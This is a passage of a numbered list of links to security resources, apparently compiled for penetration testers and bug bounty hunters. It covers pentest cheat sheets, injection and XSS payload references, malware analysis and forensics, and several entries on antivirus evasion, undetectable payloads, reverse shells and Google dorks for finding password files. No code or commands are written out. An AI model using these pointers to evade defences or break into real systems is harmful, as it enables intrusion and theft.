Sheet;\n\n\nhttps://uceka.com/2014/05/12/wireless-penetration-testing-cheat-sheet/\n\n\n-840-Pentest Cheat Sheets:\n\n\nhttps://www.cheatography.com/tag/pentest/\n\n\n-841-40 Best Penetration Testing (Pen Testing) Tools in 2019:\n\n\nhttps://www.guru99.com/top-5-penetration-testing-tools.html\n\n\n-842-Metasploit Cheat Sheet:\n\n\nhttps://www.hacking.land/2019/02/metasploit-cheat-sheet.html\n\n\n-843-OSCP useful resources and tools;\n\n\nhttps://acknak.fr/en/articles/oscp-tools/\n\n\n-844-Pentest + Exploit dev Cheatsheet:\n\n\nhttps://ehackings.com/all-posts/pentest-exploit-dev-cheatsheet/\n\n\n-845-What is Penetration Testing? A Quick Guide for 2019:\n\n\nhttps://www.cloudwards.net/penetration-testing/\n\n\n-846-Recon resource:\n\n\nhttps://pentester.land/cheatsheets/2019/04/15/recon-resources.html\n\n\n-847-Network Recon Cheat Sheet:\n\n\nhttps://www.cheatography.com/coffeefueled/cheat-sheets/network-recon/\n\n\n\n\n-848-Recon Cheat Sheets:\n\n\nhttps://www.cheatography.com/tag/recon/\n\n\n-849-Penetration Testing Active Directory, Part II:\n\n\nhttps://hausec.com/2019/03/12/penetration-testing-active-directory-part-ii/\n\n\n-850-Reverse-engineering Cheat Sheets:\n\n\nhttps://www.cheatography.com/tag/reverse-engineering/\n\n\n-851-Reverse Engineering Cheat Sheet:\n\n\nhttps://www.scribd.com/doc/38163906/Reverse-Engineering-Cheat-Sheet\n\n\n-852-ATOMBOMBING: BRAND NEW CODE INJECTION FOR WINDOWS:\n\n\nhttps://blog.ensilo.com/atombombing-brand-new-code-injection-for-windows\n\n\n-853-PROPagate:\n\n\nhttp://www.hexacorn.com/blog/2017/10/26/propagate-a-new-code-injection-trick/\n\n\n-854-Process Doppelgänging, by Tal Liberman and Eugene Kogan::\n\n\nhttps://www.blackhat.com/docs/eu-17/materials/eu-17-Liberman-Lost-In-Transaction-Process-Doppelganging.pdf\n\n\n-855-Gargoyle:\n\n\nhttps://jlospinoso.github.io/security/assembly/c/cpp/developing/software/2017/03/04/gargoyle-memory-analysis-evasion.html\n\n\n-856-GHOSTHOOK:\n\n\nhttps://www.cyberark.com/threat-research-blog/ghosthook-bypassing-patchguard-processor-trace-based-hooking/\n\n\n-857-Learn C:\n\n\nhttps://www.programiz.com/c-programming\n\n\n-858-x86 Assembly Programming Tutorial:\n\n\nhttps://www.tutorialspoint.com/assembly_programming/\n\n\n-859-Dr. Paul Carter's PC Assembly Language:\n\n\nhttp://pacman128.github.io/pcasm/\n\n\n-860-Introductory Intel x86 - Architecture, Assembly, Applications, and Alliteration:\n\n\nhttp://opensecuritytraining.info/IntroX86.html\n\n\n-861-x86 Disassembly:\n\n\nhttps://en.wikibooks.org/wiki/X86_Disassembly\n\n\n-862-use-of-dns-tunneling-for-cc-communications-malware:\n\n\nhttps://securelist.com/use-of-dns-tunneling-for-cc-communications/78203/\n\n\n-863-Using IDAPython to Make Your Life Easier (Series)::\n\n\nhttps://researchcenter.paloaltonetworks.com/2015/12/using-idapython-to-make-your-life-easier-part-1/\n\n\n-864-NET binary analysis:\n\n\nhttps://cysinfo.com/cyber-attack-targeting-cbi-and-possibly-indian-army-officials/\n\n\n-865-detailed analysis of the BlackEnergy3 big dropper:\n\n\nhttps://cysinfo.com/blackout-memory-analysis-of-blackenergy-big-dropper/\n\n\n-866-detailed analysis of Uroburos rootkit:\n\n\nhttps://www.gdatasoftware.com/blog/2014/06/23953-analysis-of-uroburos-using-windbg\n\n\n-867-TCP/IP and tcpdump Pocket Reference Guide:\n\n\nhttps://www.sans.org/security-resources/tcpip.pdf\n\n\n-868-TCPDUMP Cheatsheet:\n\n\nhttp://packetlife.net/media/library/12/tcpdump.pdf\n\n\n-869-Scapy Cheatsheet:\n\n\nhttp://packetlife.net/media/library/36/scapy.pdf\n\n\n-870-WIRESHARK DISPLAY FILTERS:\n\n\nhttp://packetlife.net/media/library/13/Wireshark_Display_Filters.pdf\n\n\n-871-Windows command line sheet:\n\n\nhttps://www.sans.org/security-resources/sec560/windows_command_line_sheet_v1.pdf\n\n\n-872-Metasploit cheat sheet:\n\n\nhttps://www.sans.org/security-resources/sec560/misc_tools_sheet_v1.pdf\n\n\n-873-IPv6 Cheatsheet:\n\n\nhttp://packetlife.net/media/library/8/IPv6.pdf\n\n\n-874-IPv4 Subnetting:\n\n\nhttp://packetlife.net/media/library/15/IPv4_Subnetting.pdf\n\n\n-875-IOS IPV4 ACCESS LISTS:\n\n\nhttp://packetlife.net/media/library/14/IOS_IPv4_Access_Lists.pdf\n\n\n-876-Common Ports List:\n\n\nhttp://packetlife.net/media/library/23/common_ports.pdf\n\n\n-877-WLAN:\n\n\nhttp://packetlife.net/media/library/4/IEEE_802.11_WLAN.pdf\n\n\n-878-VLANs Cheatsheet:\n\n\nhttp://packetlife.net/media/library/20/VLANs.pdf\n\n\n-879-VoIP Basics CheatSheet:\n\n\nhttp://packetlife.net/media/library/34/VOIP_Basics.pdf\n\n\n-880-Google hacking and defense cheat sheet:\n\n\nhttps://www.sans.org/security-resources/GoogleCheatSheet.pdf\n\n\n-881-Nmap CheatSheet:\n\n\nhttps://pen-testing.sans.org/blog/2013/10/08/nmap-cheat-sheet-1-0\n\n\n\n-882-Netcat cheat sheet:\n\n\nhttps://www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf\n\n\n-883-PowerShell cheat sheet:\n\n\nhttps://blogs.sans.org/pen-testing/files/2016/05/PowerShellCheatSheet_v41.pdf\n\n\n-884-Scapy cheat sheet POCKET REFERENCE:\n\n\nhttps://blogs.sans.org/pen-testing/files/2016/04/ScapyCheatSheet_v0.2.pdf\n\n\n-885-SQL injection cheat sheet.:\n\n\nhttps://information.rapid7.com/sql-injection-cheat-sheet-download.html\n\n\n-886-Injection cheat sheet:\n\n\nhttps://information.rapid7.com/injection-non-sql-cheat-sheet-download.html\n\n\n-887-Symmetric Encryption Algorithms cheat sheet:\n\n\nhttps://www.cheatography.com/rubberdragonfarts/cheat-sheets/symmetric-encryption-algorithms/\n\n\n-888-Intrusion Discovery Cheat Sheet v2.0 for Linux:\n\n\nhttps://pen-testing.sans.org/retrieve/linux-cheat-sheet.pdf\n\n\n-889-Intrusion Discovery Cheat Sheet v2.0 for Window:\n\n\nhttps://pen-testing.sans.org/retrieve/windows-cheat-sheet.pdf\n\n\n-890-Memory Forensics Cheat Sheet v1.2:\n\n\nhttps://digital-forensics.sans.org/media/memory-forensics-cheat-sheet.pdf\n\n\n-891-CRITICAL LOG REVIEW CHECKLIST FOR SECURITY INCIDENTS G E N E R AL APPROACH:\n\n\nhttps://www.sans.org/brochure/course/log-management-in-depth/6\n\n\n-892-Evidence collection cheat sheet:\n\n\nhttps://digital-forensics.sans.org/media/evidence_collection_cheat_sheet.pdf\n\n\n-893-Hex file and regex cheat sheet v1.0:\n\n\nhttps://digital-forensics.sans.org/media/hex_file_and_regex_cheat_sheet.pdf\n\n\n-894-Rekall Memory Forensic Framework Cheat Sheet v1.2.:\n\n\nhttps://digital-forensics.sans.org/media/rekall-memory-forensics-cheatsheet.pdf\n\n\n-895-SIFT WORKSTATION Cheat Sheet v3.0.:\n\n\nhttps://digital-forensics.sans.org/media/sift_cheat_sheet.pdf\n\n\n-896-Volatility Memory Forensic Framework Cheat Sheet:\n\n\nhttps://digital-forensics.sans.org/media/volatility-memory-forensics-cheat-sheet.pdf\n\n\n-897-Hands - on Network Forensics.:\n\n\nhttps://www.first.org/resources/papers/conf2015/first_2015_-_hjelmvik-_erik_-_hands-on_network_forensics_20150604.pdf\n\n\n-898-VoIP Security Vulnerabilities.:\n\n\nhttps://www.sans.org/reading-room/whitepapers/voip/voip-security-vulnerabilities-2036\n\n\n-899-Incident Response: How to Fight Back:\n\n\nhttps://www.sans.org/reading-room/whitepapers/analyst/incident-response-fight-35342\n\n\n-900-BI-7_VoIP_Analysis_Fundamentals:\n\n\nhttps://sharkfest.wireshark.org/sharkfest.12/presentations/BI-7_VoIP_Analysis_Fundamentals.pdf\n\n\n-901-Bug Hunting Guide:\n\n\ncybertheta.blogspot.com/2018/08/bug-hunting-guide.html\n\n\n-902-Guide 001 |Getting Started in Bug Bounty Hunting:\n\n\nhttps://whoami.securitybreached.org/2019/.../guide-getting-started-in-bug-bounty-hun...\n\n\n-903-SQL injection cheat sheet :\n\n\nhttps://portswigger.net › Web Security Academy › SQL injection › Cheat sheet\n\n\n-904-RSnake's XSS Cheat Sheet:\n\n\nhttps://www.in-secure.org/2018/08/22/rsnakes-xss-cheat-sheet/\n\n\n-905-Bug Bounty Tips (2):\n\n\nhttps://ctrsec.io/index.php/2019/03/20/bug-bounty-tips-2/\n\n\n-906-A Review of my Bug Hunting Journey:\n\n\nhttps://kongwenbin.com/a-review-of-my-bug-hunting-journey/\n\n\n-907-Meet the First Hacker Millionaire on HackerOne:\n\n\nhttps://itblogr.com/meet-the-first-hacker-millionaire-on-hackerone/\n\n\n-908-XSS Cheat Sheet:\n\n\nhttps://www.reddit.com/r/programming/comments/4sn54s/xss_cheat_sheet/\n\n\n-909-Bug Bounty Hunter Methodology:\n\n\nhttps://www.slideshare.net/bugcrowd/bug-bounty-hunter-methodology-nullcon-2016\n\n\n-910-#10 Rules of Bug Bounty:\n\n\nhttps://hackernoon.com/10-rules-of-bug-bounty-65082473ab8c\n\n\n-911-Bugbounty Checklist:\n\n\nhttps://www.excis3.be/bugbounty-checklist/21/\n\n\n-912-FireBounty | The Ultimate Bug Bounty List!:\n\n\nhttps://firebounty.com/\n\n\n-913-Brutelogic xss cheat sheet 2019:\n\n\nhttps://brutelogic.com.br/blog/ebook/xss-cheat-sheet/\n\n\n-914-XSS Cheat Sheet by Rodolfo Assis:\n\n\nhttps://leanpub.com/xss\n\n\n-915-Cross-Site-Scripting (XSS) – Cheat Sheet:\n\n\nhttps://ironhackers.es/en/cheatsheet/cross-site-scripting-xss-cheat-sheet/\n\n\n-916-XSS Cheat Sheet V. 2018 :\n\n\nhttps://hackerconnected.wordpress.com/2018/03/15/xss-cheat-sheet-v-2018/\n\n\n-917-Cross-site Scripting Payloads Cheat Sheet :\n\n\nhttps://exploit.linuxsec.org/xss-payloads-list\n\n\n-918-Xss Cheat Sheet :\n\n\nhttps://www.in-secure.org/tag/xss-cheat-sheet/\n\n\n-919-Open Redirect Cheat Sheet :\n\n\nhttps://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html\n\n\n-920-XSS, SQL Injection and Fuzzing Bar Code Cheat Sheet:\n\n\nhttps://www.irongeek.com/xss-sql-injection-fuzzing-barcode-generator.php\n\n\n-921-XSS Cheat Sheet:\n\n\nhttps://tools.paco.bg/13/\n\n\n-922-XSS for ASP.net developers:\n\n\nhttps://www.gosecure.net/blog/2016/03/22/xss-for-asp-net-developers\n\n\n-923-Cross-Site Request Forgery Cheat Sheet:\n\n\nhttps://trustfoundry.net/cross-site-request-forgery-cheat-sheet/\n\n\n-924-CSRF Attacks: Anatomy, Prevention, and XSRF Tokens:\n\n\nhttps://www.acunetix.com/websitesecurity/csrf-attacks/\n\n\n-925-Cross-Site Request Forgery (CSRF) Prevention Cheat Sheet :\n\n\nhttps://mamchenkov.net/.../05/.../cross-site-request-forgery-csrf-prevention-cheat-shee...\n\n\n-926-Guide to CSRF (Cross-Site Request Forgery):\n\n\nhttps://www.veracode.com/security/csrf\n\n\n-927-Cross-site Request Forgery - Exploitation & Prevention:\n\n\nhttps://www.netsparker.com/blog/web-security/csrf-cross-site-request-forgery/\n\n\n-928-SQL Injection Cheat Sheet :\n\n\nhttps://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/\n\n\n-929-MySQL SQL Injection Practical Cheat Sheet:\n\n\nhttps://www.perspectiverisk.com/mysql-sql-injection-practical-cheat-sheet/\n\n\n-930-SQL Injection (SQLi) - Cheat Sheet, Attack Examples & Protection:\n\n\nhttps://www.checkmarx.com/knowledge/knowledgebase/SQLi\n\n\n-931-SQL injection attacks: A cheat sheet for business pros:\n\n\nhttps://www.techrepublic.com/.../sql-injection-attacks-a-cheat-sheet-for-business-pros/\n\n\n-932-The SQL Injection Cheat Sheet:\n\n\nhttps://biztechmagazine.com/article/.../guide-combatting-sql-injection-attacks-perfcon\n\n\n-933-SQL Injection Cheat Sheet:\n\n\nhttps://resources.infosecinstitute.com/sql-injection-cheat-sheet/\n\n\n-934-Comprehensive SQL Injection Cheat Sheet:\n\n\nhttps://www.darknet.org.uk/2007/05/comprehensive-sql-injection-cheat-sheet/\n\n\n-935-MySQL SQL Injection Cheat Sheet:\n\n\npentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet\n\n\n-936-SQL Injection Cheat Sheet: MySQL:\n\n\nhttps://www.gracefulsecurity.com/sql-injection-cheat-sheet-mysql/\n\n\n-937- MySQL Injection Cheat Sheet:\n\n\nhttps://www.asafety.fr/mysql-injection-cheat-sheet/\n\n\n-938-SQL Injection Cheat Sheet:\n\n\nhttps://www.reddit.com/r/netsec/comments/7l449h/sql_injection_cheat_sheet/\n\n\n-939-Google dorks cheat sheet 2019:\n\n\nhttps://sanfrantokyo.com/pph5/yxo7.php?xxx=5&lf338=google...cheat-sheet-2019\n\n\n-940-Command Injection Cheatsheet :\n\n\nhttps://hackersonlineclub.com/command-injection-cheatsheet/\n\n\n-941-OS Command Injection Vulnerability:\n\n\nhttps://www.immuniweb.com/vulnerability/os-command-injection.html\n\n\n-942-OS Command Injection:\n\n\nhttps://www.checkmarx.com/knowledge/knowledgebase/OS-Command_Injection\n\n\n-943-Command Injection: The Good, the Bad and the Blind:\n\n\nhttps://www.gracefulsecurity.com/command-injection-the-good-the-bad-and-the-blind/\n\n\n-944-OS command injection:\n\n\nhttps://portswigger.net › Web Security Academy › OS command injection\n\n\n-945-How to Test for Command Injection:\n\n\nhttps://blog.securityinnovation.com/blog/.../how-to-test-for-command-injection.html\n\n\n-946-Data Exfiltration via Blind OS Command Injection:\n\n\nhttps://www.contextis.com/en/blog/data-exfiltration-via-blind-os-command-injection\n\n\n-947-XXE Cheatsheet:\n\n\nhttps://www.gracefulsecurity.com/xxe-cheatsheet/\n\n\n-948-bugbounty-cheatsheet/xxe.:\n\n\nhttps://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/xxe.md\n\n\n-949-XXE - Information Security:\n\n\nhttps://phonexicum.github.io/infosec/xxe.html\n\n\n-950-XXE Cheat Sheet:\n\n\nhttps://www.hahwul.com/p/xxe-cheat-sheet.html\n\n\n-951-Advice From A Researcher: Hunting XXE For Fun and Profit:\n\n\nhttps://www.bugcrowd.com/blog/advice-from-a-bug-hunter-xxe/\n\n\n-952-Out of Band Exploitation (OOB) CheatSheet :\n\n\nhttps://www.notsosecure.com/oob-exploitation-cheatsheet/\n\n\n-953-Web app penentration testing checklist and cheatsheet:\n\n\nwww.malwrforensics.com/.../web-app-penentration-testing-checklist-and-cheatsheet-with-example\n\n\n\n-954-Useful Resources:\n\n\nhttps://lsdsecurity.com/useful-resources/\n\n\n-955-Exploiting XXE Vulnerabilities in IIS/.NET:\n\n\nhttps://pen-testing.sans.org/.../entity-inception-exploiting-iis-net-with-xxe-vulnerabiliti...\n\n\n-956-Top 65 OWASP Cheat Sheet Collections - ALL IN ONE:\n\n\nhttps://www.yeahhub.com/top-65-owasp-cheat-sheet-collections-all-in-one/\n\n\n-957-Hacking Resources:\n\n\nhttps://www.torontowebsitedeveloper.com/hacking-resources\n\n\n-958-Out of Band XML External Entity Injection:\n\n\nhttps://www.netsparker.com/web...scanner/.../out-of-band-xml-external-entity-injectio...\n\n\n-959-XXE - ZeroSec - Adventures In Information Security:\n\n\nhttps://blog.zsec.uk/out-of-band-xxe-2/\n\n\n-960-Blog - Automated Data Exfiltration with XXE:\n\n\nhttps://blog.gdssecurity.com/labs/2015/4/.../automated-data-exfiltration-with-xxe.html\n\n\n-961-My Experience during Infosec Interviews:\n\n\nhttps://medium.com/.../my-experience-during-infosec-interviews-ed1f74ce41b8\n\n\n-962-Top 10 Security Risks on the Web (OWASP):\n\n\nhttps://sensedia.com/.../top-10-security-risks-on-the-web-owasp-and-how-to-mitigate-t...\n\n\n-963-Antivirus Evasion Tools [Updated 2019] :\n\n\nhttps://resources.infosecinstitute.com/antivirus-evasion-tools/\n\n\n-964-Adventures in Anti-Virus Evasion:\n\n\nhttps://www.gracefulsecurity.com/anti-virus-evasion/\n\n\n-965-Antivirus Bypass Phantom Evasion - 2019 :\n\n\nhttps://www.reddit.com/r/Kalilinux/.../antivirus_bypass_phantom_evasion_2019/\n\n\n-966-Antivirus Evasion with Python:\n\n\nhttps://medium.com/bugbountywriteup/antivirus-evasion-with-python-49185295caf1\n\n\n-967-Windows oneliners to get shell:\n\n\nhttps://ironhackers.es/en/cheatsheet/comandos-en-windows-para-obtener-shell/\n\n\n-968-Does Veil Evasion Still Work Against Modern AntiVirus?:\n\n\nhttps://www.hackingloops.com/veil-evasion-virustotal/\n\n\n-969-Google dorks cheat sheet 2019 :\n\n\nhttps://sanfrantokyo.com/pph5/yxo7.php?xxx=5&lf338=google...cheat-sheet-2019\n\n\n-970-Malware Evasion Techniques :\n\n\nhttps://www.slideshare.net/ThomasRoccia/malware-evasion-techniques\n\n\n-971-How to become a cybersecurity pro: A cheat sheet:\n\n\nhttps://www.techrepublic.com/article/cheat-sheet-how-to-become-a-cybersecurity-pro/\n\n\n-972-Bypassing Antivirus With Ten Lines of Code:\n\n\nhttps://hackingandsecurity.blogspot.com/.../bypassing-antivirus-with-ten-lines-of.html\n\n\n-973-Bypassing antivirus detection on a PDF exploit:\n\n\nhttps://www.digital.security/en/blog/bypassing-antivirus-detection-pdf-exploit\n\n\n-974-Generating Payloads & Anti-Virus Bypass Methods:\n\n\nhttps://uceka.com/2014/02/19/generating-payloads-anti-virus-bypass-methods/\n\n\n-975-Apkwash Android Antivirus Evasion For Msfvemon:\n\n\nhttps://hackingarise.com/apkwash-android-antivirus-evasion-for-msfvemon/\n\n\n-976-Penetration Testing with Windows Computer & Bypassing an Antivirus:\n\n\nhttps://www.prodefence.org/penetration-testing-with-windows-computer-bypassing-antivirus\n\n\n-978-Penetration Testing: The Quest For Fully UnDetectable Malware:\n\n\nhttps://www.foregenix.com/.../penetration-testing-the-quest-for-fully-undetectable-malware\n\n\n-979-AVET: An AntiVirus Bypassing tool working with Metasploit Framework :\n\n\nhttps://githacktools.blogspot.com \n\n\n-980-Creating an undetectable payload using Veil-Evasion Toolkit:\n\n\nhttps://www.yeahhub.com/creating-undetectable-payload-using-veil-evasion-toolkit/\n\n\n-981-Evading Antivirus :\n\n\nhttps://sathisharthars.com/tag/evading-antivirus/\n\n\n-982-AVPASS – All things in moderation:\n\n\nhttps://hydrasky.com/mobile-security/avpass/\n\n\n-983-Complete Penetration Testing & Hacking Tools List:\n\n\nhttps://cybarrior.com/blog/2019/03/31/hacking-tools-list/\n\n\n\n-984-Modern red teaming: 21 resources for your security team:\n\n\nhttps://techbeacon.com/security/modern-red-teaming-21-resources-your-security-team\n\n\n-985-BloodHound and CypherDog Cheatsheet :\n\n\nhttps://hausec.com/2019/04/15/bloodhound-and-cypherdog-cheatsheet/\n\n\n\n-986-Redteam Archives:\n\n\nhttps://ethicalhackingguru.com/category/redteam/\n\n\n-987-NMAP Commands Cheat Sheet:\n\n\nhttps://www.networkstraining.com/nmap-commands-cheat-sheet/\n\n\n-988-Nmap Cheat Sheet:\n\n\nhttps://dhound.io/blog/nmap-cheatsheet\n\n\n-989-Nmap Cheat Sheet: From Discovery to Exploits:\n\n\nhttps://resources.infosecinstitute.com/nmap-cheat-sheet/\n\n\n-990-Nmap Cheat Sheet and Pro Tips:\n\n\nhttps://hackertarget.com/nmap-cheatsheet-a-quick-reference-guide/\n\n\n-991-Nmap Tutorial: from the Basics to Advanced Tips:\n\n\nhttps://hackertarget.com/nmap-tutorial/\n\n\n-992-How to run a complete network scan with OpenVAS;\n\n\nhttps://www.techrepublic.com/.../how-to-run-a-complete-network-scan-with-openvas/\n\n\n\n-993-Nmap: my own cheatsheet:\n\n\nhttps://www.andreafortuna.org/2018/03/12/nmap-my-own-cheatsheet/\n\n\n-994-Top 32 Nmap Command Examples For Linux Sys/Network Admins:\n\n\nhttps://www.cyberciti.biz/security/nmap-command-examples-tutorials/\n\n\n-995-35+ Best Free NMap Tutorials and Courses to Become Pro Hacker:\n\n\nhttps://www.fromdev.com/2019/01/best-free-nmap-tutorials-courses.html\n\n\n-996-Scanning Tools:\n\n\nhttps://widesecurity.net/kali-linux/kali-linux-tools-scanning/\n\n\n-997-Nmap - Cheatsheet:\n\n\nhttps://www.ivoidwarranties.tech/posts/pentesting-tuts/nmap/cheatsheet/\n\n\n-998-Linux for Network Engineers:\n\n\nhttps://netbeez.net/blog/linux-how-to-use-nmap/\n\n\n-999-Nmap Cheat Sheet:\n\n\nhttps://www.hackingloops.com/nmap-cheat-sheet-port-scanning-basics-ethical-hackers/\n\n\n-1000-Tactical Nmap for Beginner Network Reconnaissance:\n\n\nhttps://null-byte.wonderhowto.com/.../tactical-nmap-for-beginner-network-reconnaiss...\n\n\n\n-1001-A Guide For Google Hacking Database:\n\n\nhttps://www.hackgentips.com/google-hacking-database/\n\n\n-1002-2019 Data Breaches - The Worst Breaches, So Far:\n\n\nhttps://www.identityforce.com/blog/2019-data-breaches\n\n\n-1003-15 Vulnerable Sites To (Legally) Practice Your Hacking Skills:\n\n\nhttps://www.checkmarx.com/.../15-vulnerable-sites-to-legally-practice-your-hacking-skills\n\n\n\n-1004-Google Hacking Master List :\n\n\nhttps://it.toolbox.com/blogs/rmorril/google-hacking-master-list-111408\n\n\n-1005-Smart searching with googleDorking | Exposing the Invisible:\n\n\nhttps://exposingtheinvisible.org/guides/google-dorking/\n\n\n-1006-Google Dorks 2019:\n\n\nhttps://korben.info/google-dorks-2019-liste.html\n\n\n-1007-Google Dorks List and how to use it for Good;\n\n\nhttps://edgy.app/google-dorks-list\n\n\n-1008-How to Use Google to Hack(Googledorks):\n\n\nhttps://null-byte.wonderhowto.com/how-to/use-google-hack-googledorks-0163566/\n\n\n-1009-Using google as hacking tool:\n\n\nhttps://cybertechies007.blogspot.com/.../using-google-as-hacking-tool-googledorks.ht...\n\n\n-1010-#googledorks hashtag on Twitter:\n\n\nhttps://twitter.com/hashtag/googledorks\n\n\n-1011-Top Five Open Source Intelligence (OSINT) Tools:\n\n\nhttps://resources.infosecinstitute.com/top-five-open-source-intelligence-osint-tools/\n\n\n-1012-What is open-source intelligence (OSINT)?:\n\n\nhttps://www.microfocus.com/en-us/what-is/open-source-intelligence-osint\n\n\n\n-1013-A Guide to Open Source Intelligence Gathering (OSINT):\n\n\nhttps://medium.com/bugbountywriteup/a-guide-to-open-source-intelligence-gathering-osint-ca831e13f29c\n\n\n-1014-OSINT: How to find information on anyone:\n\n\nhttps://medium.com/@Peter_UXer/osint-how-to-find-information-on-anyone-5029a3c7fd56\n\n\n-1015-What is OSINT? How can I make use of it?:\n\n\nhttps://securitytrails.com/blog/what-is-osint-how-can-i-make-use-of-it\n\n\n-1016-OSINT Tools for the Dark Web:\n\n\nhttps://jakecreps.com/2019/05/16/osint-tools-for-the-dark-web/\n\n\n-1017-A Guide to Open Source Intelligence (OSINT):\n\n\nhttps://www.cjr.org/tow_center_reports/guide-to-osint-and-hostile-communities.php\n\n\n-1018-An Introduction To Open Source Intelligence (OSINT):\n\n\nhttps://www.secjuice.com/introduction-to-open-source-intelligence-osint/\n\n\n-1019-SSL & TLS HTTPS Testing [Definitive Guide] - Aptive:\n\n\nhttps://www.aptive.co.uk/blog/tls-ssl-security-testing/\n\n\n-1020-Exploit Title: [Files Containing E-mail and Associated Password Lists]:\n\n\nhttps://www.exploit-db.com/ghdb/4262/?source=ghdbid\n\n\n-1021-cheat_sheets:\n\n\nhttp://zachgrace.com/cheat_sheets/\n\n\n-1022-Intel SYSRET:\n\n\nhttps://pentestlab.blog/2017/06/14/intel-sysret\n\n\n-1023-Windows Preventive Maintenance Best Practices:\n\n\nhttp://www.professormesser.com/free-a-plus-training/220-902/windows-preventive-maintenance-best-practices/\n\n\n-1024-An Overview of Storage Devices:\n\n\nhttp://www.professormesser.com/?p=19367\n\n\n-1025-An Overview of RAID:\n\n\nhttp://www.professormesser.com/?p=19373\n\n\n-1026-How to Troubleshoot:\n\n\nhttp://www.professormesser.com/free-a-plus-training/220-902/how-to-troubleshoot/\n\n\n-1027-Mobile Device Security Troubleshooting:\n\n\nhttp://www.professormesser.com/free-a-plus-training/220-902/mobile-device-security-troubleshooting/\n\n\n-1028-Using Wireshark: Identifying Hosts and Users:\n\n\nhttps://unit42.paloaltonetworks.com/using-wireshark-identifying-hosts-and-users/\n\n\n-1029-Using Wireshark - Display Filter Expressions:\n\n\nhttps://unit42.paloaltonetworks.com/using-wireshark-display-filter-expressions/\n\n\n-1030-Decrypting SSL/TLS traffic with Wireshark:\n\n\nhttps://resources.infosecinstitute.com/decrypting-ssl-tls-traffic-with-wireshark/\n\n\n-1031-A collection of handy Bash One-Liners and terminal tricks for data processing and Linux system maintenance.:\n\n\nhttps://onceupon.github.io/Bash-Oneliner/\n\n\n-1032- Bash One-Liners Explained, Part I: Working with files :\n\n\nhttps://catonmat.net/bash-one-liners-explained-part-one\n\n\n-1033-Bash One-Liners Explained, Part IV: Working with history:\n\n\nhttps://catonmat.net/bash-one-liners-explained-part-four\n\n\n-1034-Useful bash one-liners :\n\n\nhttps://github.com/stephenturner/oneliners\n\n\n-1035-Some Random One-liner Linux Commands [Part 1]:\n\n\nhttps://www.ostechnix.com/random-one-liner-linux-commands-part-1/\n\n\n-1036-The best terminal one-liners from and for smart admins + devs.:\n\n\nhttps://www.ssdnodes.com/tools/one-line-wise/\n\n\n\n-1037-Shell one-liner:\n\n\nhttps://rosettacode.org/wiki/Shell_one-liner#Racket\n\n\n-1038-SSH Cheat Sheet:\n\n\nhttp://pentestmonkey.net/tag/ssh\n\n\n\n-1039-7000 Google Dork List:\n\n\nhttps://pastebin.com/raw/Tdvi8vgK\n\n\n-1040-GOOGLE HACKİNG DATABASE – GHDB:\n\n\nhttps://pastebin.com/raw/1ndqG7aq\n\n\n-1041-STEALING PASSWORD WITH GOOGLE HACK:\n\n\nhttps://pastebin.com/raw/x6BNZ7NN\n\n\n-1042-Hack Remote PC with PHP File using PhpSploit Stealth Post-Exploitation Framework:\n\n\nhttp://www.hackingarticles.in/hack-remote-pc-with-php-file-using-phpsploit-stealth-post-exploitation-framework\n\n\n\n-1043-Open Source database of android malware:\n\n\nwww.code.google.com/archive/p/androguard/wikis/DatabaseAndroidMalwares.wiki\n\n\n-1044-big-list-of-naughty-strings:\n\n\nhttps://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.txt\n\n\n-1045-publicly available cap files:\n\n\nhttp://www.netresec.com/?page=PcapFiles\n\n\n-1046-“Insertion, Evasion, and Denial of Service: Eluding Network Intrusion Detection”:\n\n\nhttp://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.119.399&rep=rep1&type=pdf\n\n\n-1047-Building a malware analysis toolkit:\n\n\nhttps://zeltser.com/build-malware-analysis-toolkit/\n\n\n\n-1048-Netcat Reverse Shell Cheat Sheet:\n\n\nhttp://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet\n\n\n\n-1049-Packers and crypters:\n\n\nhttp://securityblog.gr/2950/detect-packers-cryptors-and-compilers/\n\n\n\n-1050-Evading antivirus:\n\n\nhttp://www.blackhillsinfosec.com/?p=5094\n\n\n\n-1051-cheat sheets and information,The Art of Hacking:\n\n\nhttps://github.com/The-Art-of-Hacking\n\n\n-1052-Error-based SQL injection:\n\n\nhttps://www.exploit-db.com/docs/37953.pdf\n\n\n-1053-XSS cheat sheet:\n\n\nhttps://www.veracode.com/security/xss\n\n\n-1054-Active Directory Enumeration with PowerShell:\n\n\nhttps://www.exploit-db.com/docs/46990\n\n\n\n-1055-Buffer Overflows, C Programming, NSA GHIDRA and More:\n\n\nhttps://www.exploit-db.com/docs/47032\n\n\n\n-1056-Analysis of CVE-2019-0708 (BlueKeep):\n\n\nhttps://www.exploit-db.com/docs/46947\n\n\n\n-1057-Windows Privilege Escalations:\n\n\nhttps://www.exploit-db.com/docs/46131\n\n\n\n-1058-The Ultimate Guide For Subdomain Takeover with Practical:\n\n\n\nhttps://www.exploit-db.com/docs/46415\n\n\n\n-1059-File transfer skills in the red team post penetration test:\n\n\nhttps://www.exploit-db.com/docs/46515\n\n\n\n-1060-How To Exploit PHP Remotely To Bypass Filters & WAF Rules:\n\n\n\nhttps://www.exploit-db.com/docs/46049\n\n\n\n-1061-Flying under the radar:\n\n\n\nhttps://www.exploit-db.com/docs/45898\n\n\n-1062-what is google hacking? and why it is useful ?and how you can learn how to use it:\n\n\nhttps://twitter.com/cry__pto/status/1142497470825545729?s=20\n\n\n-1063-useful blogs for penetration testers:\n\n\nhttps://twitter.com/cry__pto/status/1142497470825545729?s=20\n\n\n\n-1064-useful #BugBounty resources & links & tutorials & explanations & writeups ::\n\n\nhttps://twitter.com/cry__pto/status/1143965322233483265?s=20\n\n\n\n-1065-Union- based SQL injection:\n\n\nhttp://securityidiots.com/Web-Pentest/SQL-Injection/Basic-Union-Based-SQL-Injection.html\n\n\n-1066-Broken access control:\n\n\nhttps://www.happybearsoftware.com/quick-check-for-access-control-vulnerabilities-in-rails\n\n\n-1067-Understanding firewall types and configurations:\n\n\nhttp://searchsecurity.techtarget.com/feature/The-five-different-types-of-firewalls\n\n\n-1068-5 Kali Linux tricks that you may not know:\n\n\nhttps://pentester.land/tips-n-tricks/2018/11/09/5-kali-linux-tricks-that-you-may-not-know.html\n\n\n\n-1069-5 